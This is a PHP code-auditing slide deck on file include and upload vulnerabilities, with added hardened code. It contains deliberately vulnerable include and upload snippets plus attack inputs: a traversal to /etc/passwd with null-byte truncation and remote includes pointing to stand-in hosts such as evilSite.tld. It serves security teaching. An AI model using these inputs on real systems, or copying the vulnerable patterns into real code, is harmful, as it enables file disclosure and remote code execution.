Page 1: PHP Code Auditing
Session 4.2 – File Include Vulnerabilities
©2009 Justin C. Klein Keane
Justin C. Klein Keane
jukeane@sas.upenn.edu

Page 2: File Include Vulnerabilities

Arbitrary file includes (reading)
  Local file includes
  Remote file includes
Directory traversal
Writing arbitrary files

Page 3: Basic PHP File Includes

Four common functions:
  include()
  include_once()
  require()
  require_once()
The difference is that require() will die (with a fatal E_ERROR) if the specified file is not found, whereas include() will only produce an E_WARNING
The _once variants will not re-include a file that has already been included

Page 4: How Includes Work

When PHP includes a file it will parse any PHP code within that file

Anything not delimited with the PHP delimiters (“<?php” and “?>”) will be treated as plain text

Plain text will simply be rendered inline

Page 5: Typical Include

<?php
include_once('header.php');
include_once($_GET['action'] . '.php');
include_once('footer.php');
?>

Page 6: Problems with Includes

Arbitrary local file includes triggered via malicious user input:

<?php
include_once('inc/'.$_GET['action']);
?>

If the user supplies "../../../../../../../etc/passwd" as the 'action' URL variable, that file will be rendered during page display!

Page 7: Incorrect Protection Schemes

Some programmers will append a file extension in an attempt to limit includes like /etc/passwd:

<?php
include('inc/'.$_GET['action'].'.php');
?>

This fails for several reasons; one is that PHP is written in C

Page 8: Caveats of C

C doesn't have a string type
Instead strings are null-terminated character arrays:

char foo[4];            /* three characters plus the terminating null */
int main() {
    foo[0] = 'B';
    foo[1] = 'A';
    foo[2] = 'R';
    foo[3] = '\0';      /* the null marks the end of "BAR" */
    return 0;
}

Without the null at the end the "string" would have no end
C reads from the start of the string until it reaches the null character when printing strings

Page 9: Tricking PHP with C Conventions

Using a null character triggers C constructs and defeats the prior example
If the user passes in:
  action=../../../../../../etc/passwd%00
then PHP executes:
  include('inc/../../../../../../etc/passwd');
because PHP terminates the string at the null byte (and ignores the appended '.php')
Most PHP programmers are unaware of this!

Page 10: Other Include Strategies

There are other ways around extension protections:

<?php
include('inc/'.$_GET['action'].'.php');
?>

An attacker can provide the GET var:
  ?action=/path/to/other/php_file.php?
which renders the final ".php" as a GET var to the included php_file.php
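A hardened replacement for the include patterns on pages 6, 7, 9 and 10, added here as an example (it is not code from the slides): the request value is reduced to an allowlist key and the resolved path is verified to lie inside the inc/ directory. The inc/ directory, the action names and the resolveAction() helper are assumptions.

```php
<?php
// Added example (not from the slides): hardened version of
// include_once('inc/' . $_GET['action'] . '.php').
// Assumes an application-defined inc/ directory next to this script.

// Allowlist of page names that may be included. The request value is
// used only as a lookup key, never as raw path material.
const ALLOWED_ACTIONS = ['home', 'about', 'contact'];

/**
 * Resolve an untrusted 'action' value to an include path, or return null.
 * Rejects NUL bytes (the %00 truncation trick), anything that is not a
 * plain page name, and anything not on the allowlist, then confirms with
 * realpath() that the resolved file really lives inside the inc/ directory.
 */
function resolveAction(string $action, string $incDir): ?string
{
    // PHP 5.3.4 and later already refuse paths containing "\0", but an
    // explicit check keeps the rule visible to auditors.
    if (strpos($action, "\0") !== false) {
        return null;
    }
    // Only letters, digits and underscore: no '/', '.', '?' or ':'.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $action)) {
        return null;
    }
    if (!in_array($action, ALLOWED_ACTIONS, true)) {
        return null;
    }
    $base = realpath($incDir);
    $file = realpath($incDir . '/' . $action . '.php');
    // realpath() returns false for a missing file; the prefix check also
    // catches a symlink inside inc/ that points elsewhere.
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

$action = isset($_GET['action']) ? (string) $_GET['action'] : 'home';
$file = resolveAction($action, __DIR__ . '/inc');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include_once 'header.php';
include_once $file;
include_once 'footer.php';
```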

Page 11: Other Dangers of Includes

Often include files are meant only to be included, not requested directly
Include files live on the filesystem though, and may contain vulnerabilities when called directly, as variables could be redefined or arbitrarily defined
Especially dangerous when register_globals is on!

Page 12: Example

Main file:
<?php
$style_dir='images/';
include_once('header.php');
[...]

Include file:
<html><head>
<title>Foo Site</title>
<style type="text/css">
@import url("<?php echo $style_dir;?>style.css");
</style></head><body>

What happens when an attacker calls:
http://sitename.tld/header.php?style_dir=http://myEvilSite.tld/css/
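One way to guard header.php against the direct call above, added here as an example (not the slides' code): the entry point defines a constant before including the file, and the include refuses to run without it. The IN_APP constant name and index.php as the entry point are assumptions.

```php
<?php
// Added example (not from the slides): an include-only header.php that
// refuses direct requests. index.php is assumed to run
//   define('IN_APP', true); $style_dir = 'images/'; require 'header.php';
// before anything else.
if (!defined('IN_APP')) {
    // A direct request such as /header.php?style_dir=http://... stops
    // here, whether or not register_globals has populated $style_dir.
    http_response_code(403);
    exit('Direct access not permitted');
}
// Never rely on register_globals: the entry point sets $style_dir, a
// safe default covers the rest, and the value is escaped before it is
// written into the CSS import.
$style_dir = isset($style_dir) ? (string) $style_dir : 'images/';
?>
<html><head>
<title>Foo Site</title>
<style type="text/css">
@import url("<?php echo htmlspecialchars($style_dir, ENT_QUOTES, 'UTF-8'); ?>style.css");
</style></head><body>
```

Keeping include-only files outside the web root removes the direct-request path entirely; the guard constant is the fallback when that is not possible.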

Page 13: Remote File Include

Rather than specifying a local resource, an attacker could specify a remote file for inclusion

Remote files must be served as plain text, rather than compiled PHP

Remote text is pulled for inclusion then the local PHP compiler interprets the text, rendering the PHP locally

Page 14: Remote File Include Requirements

/etc/php.ini has parameters that define the ability of PHP to include files:

;;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

Page 15: If allow_url_fopen is On

Attackers can include remote files:

<?php
include_once($_GET['action'] . '.php');
?>

An attacker can call:
  ?action=http://evilSite.tld/evil_script.txt?
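Added configuration example, not from the slides: the weak php.ini settings beside the hardened ones. allow_url_include (added in PHP 5.2.0, default Off) gates URL inclusion separately from allow_url_fopen, so allow_url_fopen is not the only lever.

```ini
; Weak: with both directives On, include()/require() can fetch http://
; and ftp:// URLs, which is what the page-15 request relies on.
allow_url_fopen = On
allow_url_include = On

; Hardened: include()/require() can never load a URL, and the fopen()
; family cannot either unless the application genuinely needs it.
allow_url_fopen = Off
allow_url_include = Off
```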

Page 16: Other Include Strategies

Attackers can use includes to bypass direct access restrictions such as .htaccess
  This could be used to expose files like config.ini files
Attackers can include Apache files like .htpasswd or .htaccess files, which are included as plain text, exposing their contents
Attackers can subvert program flow by calling files that are normally not included
Attackers can call files readable by Apache, such as files in /tmp which may contain sensitive data (like session cookies or malicious uploads)

Page 17: Writing Files

PHP functionality used to write files includes:
  File upload functions built into an application (such as image uploads)
  Utilizing PHP filesystem commands such as fwrite()

Page 18: Typical Image Upload Handler

$upload_dir = "files/";
$filename = basename($_FILES['form_filename']['name']);
$target = $upload_dir . $filename;
if(move_uploaded_file($_FILES['form_filename']['tmp_name'], $target)) {
    echo $filename . " has been uploaded";
} else {
    echo "Error uploading file!";
}

Page 19: Common Upload Errors

Collisions cause overwrites
File type is not checked
  Programmer may assume only image files are being uploaded, but this isn't enforced
File type is checked inappropriately
  Simply checking $_FILES['upload_file']['type'] is insufficient since this is a browser-provided parameter
Double extensions (and the programmer only checks the first one)
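A hardened handler addressing the four errors listed above, added as an example (not the slides' code): server-chosen names, exclusive create, content sniffing with finfo instead of the browser's type, and a single server-assigned extension. The storeUpload() helper, the uploads/ directory outside the web root and the allowed-type map are assumptions.

```php
<?php
// Added example (not from the slides): a hardened replacement for the
// page-18 upload handler. Assumes $upload_dir is outside the web root
// and served only through a download script, never directly by Apache.

$upload_dir = __DIR__ . '/../uploads/';   // not under DocumentRoot
$allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

/**
 * Validate one $_FILES entry and return its stored path, or null.
 * Covers the page-19 errors: collisions (random name + exclusive create),
 * unchecked type (magic-byte sniff), trusting $f['type'] (ignored), and
 * double extensions (the only extension is chosen from the sniffed MIME
 * type, so the client-supplied name never reaches the filesystem).
 */
function storeUpload(array $f, string $dir, array $allowed): ?string
{
    if ($f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
        return null;
    }
    // Sniff the real content type from the bytes, not from $f['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($f['tmp_name']);
    $ext   = array_search($mime, $allowed, true);
    if ($ext === false) {
        return null;                     // not an allowed image type
    }
    // Server-chosen name: no client input reaches the path.
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($dir, '/') . '/' . $name;
    // Exclusive create: fails instead of overwriting an existing file.
    $fh = @fopen($target, 'x');
    if ($fh === false) {
        return null;
    }
    fclose($fh);
    if (!move_uploaded_file($f['tmp_name'], $target)) {
        unlink($target);
        return null;
    }
    chmod($target, 0644);                // readable, never executable
    return $target;
}

$stored = isset($_FILES['form_filename'])
    ? storeUpload($_FILES['form_filename'], $upload_dir, $allowed)
    : null;
echo $stored === null ? 'Error uploading file!' : 'File stored';
```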

Page 20: Exploits for File Uploads

Attacker uploads a PHP file which contains a backdoor or exposes other system files

Attacker uploads a .htaccess file overwriting Apache rules

Attacker overwrites existing files to insert a backdoor

Page 21: fwrite()

The fwrite() function is a built-in function that allows Apache to write to file handles
Often used in installers to write config files
Also commonly used for logging
For more information see:
http://us3.php.net/manual/en/function.fwrite.php